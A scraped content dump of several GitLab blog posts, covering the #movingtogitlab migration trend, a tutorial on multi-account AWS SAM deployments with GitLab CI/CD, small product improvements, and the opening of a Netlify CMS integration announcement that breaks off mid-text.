[{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2018-06-03\",\n      }",{"title":4015,"description":4016,"authors":4020,"heroImage":3978,"date":3849,"body":4021,"category":299,"tags":4022},[970],"\n\nWith the recent news of [Microsoft's acquisition of GitHub](https://www.bloomberg.com/news/articles/2018-06-03/microsoft-is-said-to-have-agreed-to-acquire-coding-site-github), we've seen a trend of #movingtogitlab which now has [more than 1,000 tweets](https://twitter.com/movingtogitlab).\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Stats on how Twittersphere is responding to reports that \u003Ca href=\"https://twitter.com/github?ref_src=twsrc%5Etfw\">@github\u003C/a> is about to be acquired by \u003Ca href=\"https://twitter.com/Microsoft?ref_src=twsrc%5Etfw\">@Microsoft\u003C/a> .\u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> and \u003Ca href=\"https://twitter.com/hashtag/movingtogitlab?src=hash&amp;ref_src=twsrc%5Etfw\">#movingtogitlab\u003C/a> are the most popular in GitHub mentioned tweets, unsurprisingly \u003Ca href=\"https://t.co/dt9ZdoTQBI\">pic.twitter.com/dt9ZdoTQBI\u003C/a>\u003C/p>&mdash; Vicinitas 📈: Hashtag &amp; Keyword Tracking (@vicinitas_io) \u003Ca href=\"https://twitter.com/vicinitas_io/status/1003431925237760000?ref_src=twsrc%5Etfw\">June 4, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\nWe're also seeing a massive increase in projects migrating to GitLab.\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">We&#39;re seeing 10x the normal daily amount of repositories \u003Ca href=\"https://twitter.com/hashtag/movingtogitlab?src=hash&amp;ref_src=twsrc%5Etfw\">#movingtogitlab\u003C/a> \u003Ca href=\"https://t.co/7AWH7BmMvM\">https://t.co/7AWH7BmMvM\u003C/a> We&#39;re scaling our fleet to try to stay up. Follow the progress on \u003Ca href=\"https://t.co/hN0ce379SC\">https://t.co/hN0ce379SC\u003C/a> and \u003Ca href=\"https://twitter.com/movingtogitlab?ref_src=twsrc%5Etfw\">@movingtogitlab\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1003409836170547200?ref_src=twsrc%5Etfw\">June 3, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003Cdiv class=\"row\">\n\u003Cdiv class=\"col-md-6 col-sm-12\">\n\u003Cimg src=\"/images/blogimages/projects-created.png\" alt=\"Projects created in GitLab\">\n\u003C/div>\n\u003Cdiv class=\"col-md-6 col-sm-12\">\n\u003Cimg src=\"/images/blogimages/github-imports-chart.png\" alt=\"GitHub imports to GitLab\">\n\u003C/div>\n\u003Cdiv class=\"col-md-12 text-center\" style=\"margin-top: 5px\">\n\u003C/div>\n\u003C/div>\n\n## Why are people #movingtogitlab?\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">I love \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a>, the integration between code repository, documentation management, issue tracking and CI/CD is seamless ... and free. \u003Ca href=\"https://twitter.com/github?ref_src=twsrc%5Etfw\">@github\u003C/a> moving to Microsoft could be huge for GitLab \u003Ca href=\"https://t.co/t9Jzyf9dmV\">https://t.co/t9Jzyf9dmV\u003C/a>\u003C/p>&mdash; Oli Young (@oliyoung) \u003Ca href=\"https://twitter.com/oliyoung/status/1003408661815836672?ref_src=twsrc%5Etfw\">June 3, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Even if you go with \u003Ca href=\"https://t.co/e5iMjTswKf\">https://t.co/e5iMjTswKf\u003C/a> at first, the fact you’re able to quickly run your own GitLab CE install and migrate from \u003Ca href=\"https://t.co/e5iMjTswKf\">https://t.co/e5iMjTswKf\u003C/a> is crucial.\u003C/p>&mdash; Matt Lee (@mattl) \u003Ca href=\"https://twitter.com/mattl/status/1003437203480072192?ref_src=twsrc%5Etfw\">June 4, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">GitLab also ranks very highly on the FSF ethical criteria evaluation. \u003Ca href=\"https://t.co/oHvmNQqA1u\">https://t.co/oHvmNQqA1u\u003C/a>\u003C/p>&mdash; Matt Lee (@mattl) \u003Ca href=\"https://twitter.com/mattl/status/1003437206462136324?ref_src=twsrc%5Etfw\">June 4, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">No problem, I mean what&#39;s not to love? You improve consistently, you listen to the community and you make using your platform feel like you&#39;re a part of something special. I support you all the way, I have no need to be \u003Ca href=\"https://twitter.com/hashtag/movingtogitlab?src=hash&amp;ref_src=twsrc%5Etfw\">#movingtogitlab\u003C/a> as I&#39;ve used \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> for nearly 2 years now\u003C/p>&mdash; LTN Games (@LTNGames) \u003Ca href=\"https://twitter.com/LTNGames/status/1003079862058409984?ref_src=twsrc%5Etfw\">June 3, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\n## How to move to GitLab\n\nWe've tried to make it as simple as possible to migrate your projects from GitHub to GitLab.\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Had planned to spend the day moving our repos from \u003Ca href=\"https://twitter.com/github?ref_src=twsrc%5Etfw\">@github\u003C/a> to \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> following the MS rumours.. turns out  it took &lt; 5 minutes 😂 swish 👍🏻🦄 time for beer 👍🏻 \u003Ca href=\"https://twitter.com/hashtag/devops?src=hash&amp;ref_src=twsrc%5Etfw\">#devops\u003C/a> \u003Ca href=\"https://twitter.com/hashtag/git?src=hash&amp;ref_src=twsrc%5Etfw\">#git\u003C/a> \u003Ca href=\"https://twitter.com/hashtag/winning?src=hash&amp;ref_src=twsrc%5Etfw\">#winning\u003C/a>\u003C/p>&mdash; Aperitif (@AperitifIO) \u003Ca href=\"https://twitter.com/AperitifIO/status/1003005028590936064?ref_src=twsrc%5Etfw\">June 2, 2018\u003C/a>\u003C/blockquote>\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">It literally takes only 2 clicks to move to GitLab \u003Ca href=\"https://twitter.com/hashtag/movingtogitlab?src=hash&amp;ref_src=twsrc%5Etfw\">#movingtogitlab\u003C/a> \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> \u003Ca href=\"https://twitter.com/movingtogitlab?ref_src=twsrc%5Etfw\">@movingtogitlab\u003C/a>\u003C/p>&mdash; Pablo (@PablockMS) \u003Ca href=\"https://twitter.com/PablockMS/status/1003385604569223168?ref_src=twsrc%5Etfw\">June 3, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\nYou can read through the [documentation](https://docs.gitlab.com/ee/user/project/import/github.html) or watch the step-by-step video below.\n\n\u003Ciframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/VYOXuOg9tQI\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen>\u003C/iframe>\n\n## New users get a 75% discount on GitLab's top tier plans\n\nNew GitLab users can get 75 percent off [GitLab Ultimate](/pricing/) or [Gold](/pricing/#gitlab-com) for one year. GitLab Ultimate is our top-tier self-managed offering, and GitLab Gold is our top-tier SaaS offering hosted by GitLab.com. To qualify you have to:\n\n1. Be a new user of GitLab.\n1. Send a [tweet that includes #movingtogitlab](https://twitter.com/intent/tweet?text=I%27m%20%23movingtogitlab) from your account before Wednesday, June 6, 11:59pm Pacific time.\n1. Send an email to [movingtogitlab@gitlab.com](mailto:movingtogitlab@gitlab.com) with a link to the tweet.\n1. We will send you a discount code or a quote document that can be executed by you.\n1. You need to place an order at or before Saturday, June 30, 11:59pm Pacific time.\n",[9,930],{"slug":4024,"featured":6,"template":689},"movingtogitlab","content:en-us:blog:movingtogitlab.yml","Movingtogitlab","en-us/blog/movingtogitlab.yml","en-us/blog/movingtogitlab",{"_path":4030,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4031,"content":4037,"config":4043,"_id":4045,"_type":14,"title":4046,"_source":16,"_file":4047,"_stem":4048,"_extension":19},"/en-us/blog/multi-account-aws-sam-deployments-with-gitlab-ci",{"title":4032,"description":4033,"ogTitle":4032,"ogDescription":4033,"noIndex":6,"ogImage":4034,"ogUrl":4035,"ogSiteName":673,"ogType":674,"canonicalUrls":4035,"schema":4036},"How to set up multi-account AWS SAM deployments with GitLab CI/CD","Our guest author, an AWS Serverless hero, shares how to automate SAM deployments using GitLab CI/CD.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749666959/Blog/Hero%20Images/gitlab-aws-cover.png","https://about.gitlab.com/blog/multi-account-aws-sam-deployments-with-gitlab-ci","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to set up multi-account AWS SAM deployments with GitLab CI/CD\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Forrest Brazeal\"}],\n        \"datePublished\": \"2019-02-04\",\n      }",{"title":4032,"description":4033,"authors":4038,"heroImage":4034,"date":4040,"body":4041,"category":801,"tags":4042},[4039],"Forrest Brazeal","2019-02-04","\nI've been working with [serverless](/topics/serverless/) applications in AWS for about three years – that makes me an old salt in serverless terms! So I know that deploying and maintaining a serverless app can be tricky; the tooling often has critical gaps.\n\nAWS's [SAM (Serverless Application Model)](https://aws.amazon.com/serverless/sam/) is an open source framework that makes it easier to define AWS resources – such as Lambda functions, API Gateway APIs and DynamoDB tables – commonly used in serverless applications. Once you lay out your app in a SAM template, the next thing you need is a consistent, repeatable way to get that template off your laptop and deployed in the cloud.\n\nYou need CI/CD.\n\nI've used several different [CI/CD systems](/topics/ci-cd/) to automate SAM deployments, and I always look for the following features:\n\n- A single deployment pipeline that can build once and securely deploy to multiple AWS accounts (dev, staging, prod).\n- Dynamic feature branch deployments, so serverless devs can collaborate in the cloud without stepping on each other.\n- Automated cleanup of feature deployments.\n- Review of our SAM application directly integrated with the CI/CD tool's user interface.\n- Manual confirmation before code is released into production.\n\nIn this post, we'll find out how [GitLab CI](/solutions/continuous-integration/) can check these boxes on its way to delivering effective CI/CD for AWS SAM. You can follow along using [the official example code, available here](https://gitlab.com/gitlab-examples/aws-sam).\n\n## Multi-account AWS deployments\n\nWe'll want to set up our deployment pipeline across multiple AWS accounts, because accounts are the only true security boundary in AWS. We don't want to run any risk of deploying prod data in dev, or vice versa. Our multi-account setup will look something like this:\n\nAny time we work with multiple AWS accounts, we need cross-account [IAM roles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) in order to authorize deployments. We'll handle this task through the following steps. (All referenced scripts are available in the [example repo](https://gitlab.com/gitlab-examples/aws-sam))\n\n### 1\\. Establish three AWS accounts for development, staging, and production deployments\n\nYou can use existing AWS accounts if you have them, or [provision new ones under an AWS Organization](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_accounts_create.html).\n\n### 2\\. Set up GitLab IAM roles in each account\n\nRun the following AWS CLI call with admin credentials in each of the three accounts:\n\n```\naws cloudformation deploy --stack-name GitLabCIRoles --template-file setup-templates/roles.yml --capabilities CAPABILITY_NAMED_IAM --parameter-overrides CIAccountID=\"\u003CAWS Account ID where your GitLab CI/CD runner lives>\" CIAccountSTSCondition=\"\u003CThe aws:userid for the IAM principal used by the Gitlab runner>\"\n  ```\n\nReplace `CIAccountID` and `CIAccountSTSCondition` as indicated with values from the AWS account where your GitLab CI/CD runner exists. (Need help finding the `aws:userid` for your runner’s IAM principal? Check out [this guide](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_variables.html#principaltable).)\n\nThis CloudFormation template defines two roles: `SharedServiceRole` and `SharedDeploymentRole`. The `SharedServiceRole` is assumed by the GitLab CI/CD runner when calling the AWS CloudFormation service. This role trusts the GitLab CI/CD runner's role. It has permissions to call the CloudFormation service, pass a role via IAM, and access S3 and CloudFront: nothing else. This role is not privileged enough to do arbitrary AWS deployments on its own.\n\nThe `SharedDeploymentRole`, on the other hand, has full administrative access to perform any AWS action. A such, it cannot be assumed directly by the GitLab CI/CD runner. Instead, this role must be \"passed\" to CloudFormation using the service's `RoleArn` parameter. The CloudFormation service trusts the `SharedDeploymentRole` and can use it to deploy whatever resources are needed as part of the pipeline.\n\n### 3\\. Create an S3 bucket for CI artifacts\n\nGrab the AWS account ID for each of your development, staging, and production accounts, then deploy this CloudFormation template **in the account where your GitLab CI/CD Runner exists**:\n\n`aws cloudformation deploy --stack-name GitLabCIBucket --template-file setup-templates/ci-bucket.yml --parameter-overrides DevAwsAccountId=\"\u003CAWS Account ID for dev>\" StagingAwsAccountId=\"\u003CAWS Account ID for staging>\" ProdAwsAccountId=\"\u003CAWS Account ID for prod>\" ArtifactBucketName=\"\u003CA unique name for your bucket>\"`\n\nThis CloudFormation template creates a centralized S3 bucket which holds the artifacts created during your pipeline run. Artifacts are created once for each branch push and reused between staging and production. The bucket policy allows the development, test, and production accounts to reference the same artifacts when deploying CloudFormation stacks -- checking off our \"build once, deploy many\" requirement.\n\n### 4\\. Assume the `SharedServiceRole` before making any cross-account AWS calls\nWe have provided the script `assume-role.sh`, which will assume the provided role and export temporary AWS credentials to the current shell. It is sourced in the various `.gitlab-ci.yml` build scripts.\n\n## Single deployment pipeline\n\nThat brings us to the `.gitlab-ci.yml` file you can see at the root of our example repository. GitLab CI/CD is smart enough to dynamically create and execute the pipeline based on that template when we push code to GitLab. The file has a number of variables at the top that you can tweak based on your environment specifics.\n\n### Stages\n\nOur Gitlab CI/CD pipeline contains seven possible stages, defined as follows:\n\n![Multi-account AWS SAM deployment model with GitLab CI](https://about.gitlab.com/images/blogimages/multi-account-aws-sam/deployment-model.png){: .shadow.medium.center}\n\n```yaml\nstages:\n - test\n - build-dev\n - deploy-dev\n - build-staging\n - deploy-staging\n - create-change-prod\n - execute-change-prod\n```\n\n![Deployment lifecycle stages](https://about.gitlab.com/images/blogimages/multi-account-aws-sam/deployment-lifecycle-stages.png){: .shadow.medium.center}\n\n\"Stages\" are used as a control flow mechanism when building the pipeline. Multiple build jobs within a stage will run in parallel, but all jobs in a given stage must complete before any jobs belonging to the next stage in the list can be executed.\n\nAlthough seven stages are defined here, only certain ones will execute, depending on what kind of Git action triggered our pipeline. We effectively have three stages to any deployment: a \"test\" phase where we run unit tests and dependency scans against our code, a \"build\" phase that packages our SAM template, and a \"deploy\" phase split into two parts: creating a [CloudFormation change set](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/using-cfn-updating-stacks-changesets.html) and then executing that change set in the target environment.\n\n#### Test\n\nOur `.gitlab-ci.yml` file currently runs two types of tests: unit tests against our code, and dependency scans against our third-party Python packages.\n\n##### Unit tests\n\nUnit tests run on every branch pushed to the remote repository. This behavior is defined by the `only: branches` property in the job shown below:\n\n```yaml\ntest:unit:\n stage: test\n only:\n   - branches\n script: |\n   if test -f requirements.txt; then\n       pip install -r requirements.txt\n   fi\n   python -m pytest --ignore=functions/\n```\n\nEvery GitLab CI/CD job runs a script. Here, we install any dependencies, then execute Python unit tests.\n\n##### Dependency scans\n\n[Dependency scans](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/), which can take a few minutes, run only on code pushed to the master branch; it would be counterproductive for developers to wait on them every time they want to test code.\n\nThese scans use a hardcoded, standard Docker image to mount the code and run \"Docker in Docker\" checks against a database of known package vulnerabilities. If a vulnerability is found, the pipeline will log the error without stopping the build (that's what the `allow-failure: true` property does).\n\n#### Build\n\nThe build stage turns our SAM template into CloudFormation and turns our Python code into a valid AWS Lambda deployment package. For example, here's the `build:dev` job:\n\n```yaml\nbuild:dev:\n stage: build-dev\n \u003C\u003C: *build_script\n variables:\n   \u003C\u003C: *dev_variables\n artifacts:\n   paths:\n     - deployment.yml\n   expire_in: 1 week\n only:\n   - branches\n except:\n   - master\n```\n\nWhat's going on here? Note first the combination of `only` and `except` properties to ensure that our development builds happen only on pushes to branches that aren't `master`. We're referring to `dev_variables`, the set of development-specific variables defined at the top of `.gitlab-ci.yml`. And we're running a script, pointed to by `build_script`, which packages our SAM template and code for deployment using the `aws cloudformation package` CLI call.\n\nThe artifact `deployment.yml` is the CloudFormation template output by our package command. It has all the implicit SAM magic expanded into CloudFormation resources. By managing it as an artifact, we can pass it along to further steps in the build pipeline, even though it isn't committed to our repository.\n\n#### Deploy\nOur deployments use AWS CloudFormation to deploy the packaged application in a target AWS environment.\n\nIn development and staging environments, we use the `aws cloudformation deploy` command to create a change set and immediately execute it. In production, we put a manual \"wait\" in the pipeline at this point so you have the opportunity to review the change set before moving onto the \"Execute\" step, which actually calls `aws cloudformation execute-changeset` to update the underlying stack.\n\nOur deployment jobs use a helper script, committed to the top level of the example repository, called `cfn-wait.sh`. This script is needed because the `aws cloudformation` commands don't wait for results; they report success as soon as the stack operation starts. To properly record the deployment results in our job, we need a script that polls the CloudFormation service and throws an error if the deployment or update fails.\n\n## Dynamic feature branch deployments and Review Apps\n\n![Dynamic feature branch deployments and Review Apps](https://about.gitlab.com/images/blogimages/multi-account-aws-sam/dynamic-feature-branch-deployments.png){: .shadow.medium.center}\n\nWhen a non-master branch is pushed to GitLab, our pipeline runs tests, builds the [updated source code](/solutions/source-code-management/), and deploys and/or updates the changed CloudFormation resources in the development AWS account. When the branch is merged into master, or if someone clicks the \"Stop\" button next to the branch's environment in GitLab CI, the CloudFormation stack will be torn down automatically.\n\nIt is perfectly possible, and indeed desirable, to have multiple development feature branches simultaneously deployed as live environments for more efficient parallel feature development and QA. The serverless model makes this a cost-effective strategy for collaborating in the cloud.\n\nIf we are dynamically deploying our application on every branch push, we might like to view it as part of our interaction with the GitLab console (such as during a code review). GitLab supports this with a nifty feature called [Review Apps](https://docs.gitlab.com/ee/ci/review_apps/). Review Apps allow you to specify an \"environment\" as part of a deployment job, as seen in our `deploy:dev` job below:\n\n```yaml\ndeploy:dev:\n \u003C\u003C: *deploy_script\n stage: deploy-dev\n dependencies:\n   - build:dev\n variables:\n   \u003C\u003C: *dev_variables\n environment:\n   name: review/$CI_COMMIT_REF_NAME\n   url: https://${CI_COMMIT_REF_NAME}.${DEV_HOSTED_ZONE_NAME}/services\n   on_stop: stop:dev\n only:\n   - branches\n except:\n   - master\n```\n\nThe link specified in the `url` field of the `environment` property will be accessible in the `Environments` section of GitLab CI/CD or on any merge request of the associated branch. (In the case of the sample SAM application provided with our example, since we don't have a front end to view, the link just takes you to a GET request for the `/services` API endpoint and should display some raw JSON in your browser.)\n\n![Link to live environment](https://about.gitlab.com/images/blogimages/multi-account-aws-sam/link-live-environment.png){: .shadow.medium.center}\n\nThe `on_stop` property specifies what happens when you \"shut down\" the environment in GitLab CI. This can be done manually or by deleting the associated branch. In the case above, we have stopped behavior for dev environments linked to a separate job called `stop:dev`:\n\n```yaml\nstop:dev:\n stage: deploy-dev\n variables:\n   GIT_STRATEGY: none\n   \u003C\u003C: *dev_variables\n \u003C\u003C: *shutdown_script\n when: manual\n environment:\n   name: review/$CI_COMMIT_REF_NAME\n   action: stop\n only:\n   - branches\n except:\n   - master\n```\n\nThis job launches the `shutdown_script` script, which calls `aws cloudformation teardown` to clean up the SAM deployment.\n\nFor safety's sake, there is no automated teardown of staging or production environments.\n\n## Production releases\n\n![Production releases](https://about.gitlab.com/images/blogimages/multi-account-aws-sam/production-releases.png){: .shadow.medium.center}\n\nWhen a change is merged into the master branch, the code is built, tested (including dependency scans) and deployed to the staging environment. This is a separate, stable environment that developers, QA, and others can use to verify changes before attempting to deploy in production.\n\n![Staging environment](https://about.gitlab.com/images/blogimages/multi-account-aws-sam/staging-environment.png){: .shadow.medium.center}\n\nAfter deploying code to the staging environment, the pipeline will create a change set for the production stack, and then pause for a manual intervention. A human user must click a button in the Gitlab CI/CD \"Environments\" view to execute the final change set.\n\n## Now what?\n\nStep back and take a deep breath – that was a lot of information! Let's not lose sight of what we've done here: we've defined a secure, multi-account AWS deployment pipeline in our GitLab repo, integrated tests, builds and deployments, and successfully rolled a SAM-defined serverless app to the cloud. Not bad for a few lines of config!\n\nThe next step is to try this on your own. If you'd like to start with our sample \"AWS News\" application, you can simply run `sam init --location git+https://gitlab.com/gitlab-examples/aws-sam` to download the project on your local machine. The AWS News app contains a stripped-down, single-account version of the `gitlab-ci.yml` file discussed in this post, so you can try out deployments with minimal setup needed.\n\n## Further reading\n\nWe have barely scratched the surface of GitLab CI/CD and AWS SAM in this post. Here are some interesting readings if you would like to take your work to the next level:\n\n### SAM\n\n- [Implementing safe AWS Lambda deployments with AWS SAM and CodeDeploy](https://aws.amazon.com/blogs/compute/implementing-safe-aws-lambda-deployments-with-aws-codedeploy/)\n- [Running and debugging serverless applications locally using the AWS SAM CLI](https://docs.aws.amazon.com/serverless-application-model/latest/developerguide/serverless-test-and-debug.html)\n\n### GitLab CI\n\n- [Setting up a GitLab Runner on EC2](https://hackernoon.com/configuring-gitlab-ci-on-aws-ec2-using-docker-7c359d513a46)\n- [Scheduled pipelines](https://docs.gitlab.com/ee/ci/pipelines/schedules.html)\n- [ChatOps](https://docs.gitlab.com/ee/ci/chatops/)\n\nPlease [let me know](https://twitter.com/forrestbrazeal) if you have further questions!\n\n### About the guest author\n\nForrest Brazeal is an [AWS Serverless Hero](https://aws.amazon.com/developer/community/heroes/forrest-brazeal/). He currently works as a senior cloud architect at [Trek10](https://trek10.com), an AWS Advanced Consulting Partner. You can [read more about Trek10's GitLab journey here](/customers/trek10/).\n",[109,1037,231,9,1802,910],{"slug":4044,"featured":6,"template":689},"multi-account-aws-sam-deployments-with-gitlab-ci","content:en-us:blog:multi-account-aws-sam-deployments-with-gitlab-ci.yml","Multi Account Aws Sam Deployments With Gitlab Ci","en-us/blog/multi-account-aws-sam-deployments-with-gitlab-ci.yml","en-us/blog/multi-account-aws-sam-deployments-with-gitlab-ci",{"_path":4050,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4051,"content":4057,"config":4063,"_id":4065,"_type":14,"title":4066,"_source":16,"_file":4067,"_stem":4068,"_extension":19},"/en-us/blog/mvcs-with-big-results",{"title":4052,"description":4053,"ogTitle":4052,"ogDescription":4053,"noIndex":6,"ogImage":4054,"ogUrl":4055,"ogSiteName":673,"ogType":674,"canonicalUrls":4055,"schema":4056},"4 Examples of MVCs with big results","Small change, big impact. Here are four recent tweaks to GitLab which exemplify our value of iteration.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678764/Blog/Hero%20Images/mvcs-big-results.jpg","https://about.gitlab.com/blog/mvcs-with-big-results","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"4 Examples of MVCs with big results\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Victor Wu\"}],\n        \"datePublished\": \"2018-09-07\",\n      }",{"title":4052,"description":4053,"authors":4058,"heroImage":4054,"date":4060,"body":4061,"category":299,"tags":4062},[4059],"Victor Wu","2018-09-07","\nIteration is [one of our values](https://handbook.gitlab.com/handbook/values/#iteration), and it's often the hardest to stick to. It’s difficult to determine the smallest feature or update that will still bring additional value to users. The benefit is that we can ship quickly and get feedback from GitLab users within days or weeks, instead of months or quarters.\n\nAt GitLab we practice iteration by shipping Minimally Viable Changes (MVCs). This can be a new feature scoped to a small functionality, or incremental improvements on it thereafter. Read more about MVC in our [Product handbook](/handbook/product/product-principles/#the-minimal-viable-change-mvc).\n\nDespite being small, these new features often nonetheless have a big impact. Here are some of our recent MVCs that did just that:\n\n## 1. Function: Assignee lists and milestone lists\n\nIntroduced in 11.1, [issue board assignee lists](/releases/2018/06/22/gitlab-11-0-released/#issue-board-assignee-lists) offer a way to monitor team bandwidth right within your issue board, by showing all issues assigned to a specific user. See [4 ways to use GitLab Issue Boards](/blog/4-ways-to-use-gitlab-issue-boards/#3-team-visibility-with-assignee-lists) for more details, and [check out the documentation for assignee lists here](https://docs.gitlab.com/ee/user/project/issue_board.html#assignee-lists).\n\nIn 11.2, we added [milestone lists](/releases/2018/08/22/gitlab-11-2-released/#issue-board-milestone-lists) to allow you to view all issues assigned to a specific milestone. With this visibility, you can move issues across different milestones easily to balance [issue weight](/releases/2018/08/22/gitlab-11-2-released/#summed-weights-in-issue-board-list). View [the documentation for milestone lists here](https://docs.gitlab.com/ee/user/project/issue_board.html#milestone-lists).\n\n## 2. Design: Merge request widget info and pipeline sections redesign\n\nSometimes it's not new functionality that makes a big difference, but just changing how you view it. In 11.1, we [tweaked the design of the information and pipeline sections](/releases/2018/07/22/gitlab-11-1-released/#merge-request-widget-info-and-pipeline-sections-redesign) in a [merge request](https://docs.gitlab.com/ee/user/project/merge_requests/), making them easier to digest.\n\n![Merge request redesign](https://about.gitlab.com/images/11_1/mr-widget-info-pipeline.png){: .shadow.medium.center}\n\n## 3. Navigation: Groups dropdown\n\nAlso in 11.1, we made it easier to switch between groups and avoid disruption to your workflow by adding a [dropdown to the groups link in the top navigation](/releases/2018/07/22/gitlab-11-1-released/#groups-dropdown-in-navigation). There's no need to navigate away from your work, and your frequently visited groups are handily displayed for quick access.\n\n## 4. Shortcut: Confidential issue quick action\n\n[Quick actions](https://docs.gitlab.com/ee/user/project/quick_actions.html) make your GitLab life easier and are easy to contribute! As of 11.1 you can quickly and easily [mark an issue confidential right from the comment field](/releases/2018/07/22/gitlab-11-1-released/#confidential-issue-quick-action), thanks to a community contribution.\n\nInspired to contribute an MVC yourself? Find out [how to start contributing to GitLab](/community/contribute/). You can also check out some more [MVCs coming up in 11.3](/blog/epics-roadmap/).\n\nPhoto by [Ravali Yan](https://unsplash.com/photos/fleZeABaSWY?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/search/photos/upwards?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\n{: .note}\n",[1099,803,9],{"slug":4064,"featured":6,"template":689},"mvcs-with-big-results","content:en-us:blog:mvcs-with-big-results.yml","Mvcs With Big Results","en-us/blog/mvcs-with-big-results.yml","en-us/blog/mvcs-with-big-results",{"_path":4070,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4071,"content":4077,"config":4082,"_id":4084,"_type":14,"title":4085,"_source":16,"_file":4086,"_stem":4087,"_extension":19},"/en-us/blog/netlify-launches-gitlab-support",{"title":4072,"description":4073,"ogTitle":4072,"ogDescription":4073,"noIndex":6,"ogImage":4074,"ogUrl":4075,"ogSiteName":673,"ogType":674,"canonicalUrls":4075,"schema":4076},"Netlify CMS launches support for GitLab","Make it even easier to bring developers and content creators together, so everyone can contribute.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749671196/Blog/Hero%20Images/gitlab-netlify-cover.png","https://about.gitlab.com/blog/netlify-launches-gitlab-support","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Netlify CMS launches support for GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Rebecca Dodd\"}],\n        \"datePublished\": \"2018-06-13\",\n      }",{"title":4072,"description":4073,"authors":4078,"heroImage":4074,"date":4079,"body":4080,"category":299,"tags":4081},[1859],"2018-06-13","\n\nMaking it possible that “[everyone can contribute](/company/mission/#mission)” is our mission, and any development that brings us closer to it is great news! That’s why we’re happy to tell you that open source content management system [Netlify CMS](https://www.netlify.com/) is [launching support for GitLab as a back end](https://www.netlifycms.org/blog/2018/06/netlify-cms-now-supports-gitlab-as-a-backend/) today.\n\nAs more developers move to static site generators to pre-build their site’s front end for a more reliable, secure, and fast site experience, it’s important that other team members are empowered to contribute to site content easily. While [all GitLab team-members learn to contribute to this very site using GitLab itself](/blog/people-ops-using-gitlab/), most non-technical folks are accustomed to a CMS with a familiar user interface and a WYSIWYG. A simple UI wrapper for your Git repository, Netlify CMS automatically syncs all content edits made through its UI to the repository, so changes are treated in exactly the same way as code (including versioning, rollbacks, continuous deployment, and so on).\n\nThis is one of Netlify CMS’ most highly requested integrations, so much so that the plan to make it happen it is responsible for their project’s single largest contributor coming on board! GitLab users can now take advantage of the integration to simplify publishing with any SSG. Check out how it works:\n\n![Netlify CMS GitLab integration demo](https://about.gitlab.com/images/blogimages/gitlab-netlifycms-gif.gif){: .shadow.medium.center}\n\n1. An editor makes a change in the Netlify CMS\n2. That change automatically syncs to your GitLab repository\n3. And that action triggers a build to your published site\n\nReady to give it a spin? The easiest way to get started is to click on the button below: it'll automatically deploy a Netlify CMS template to a GitLab repository. It's prepackaged with the Hugo static site generator and deploys to Netlify so you can see a real, working site right away. You can also check out [the documentation](https://www.netlifycms.org/docs/start-with-a-template/). 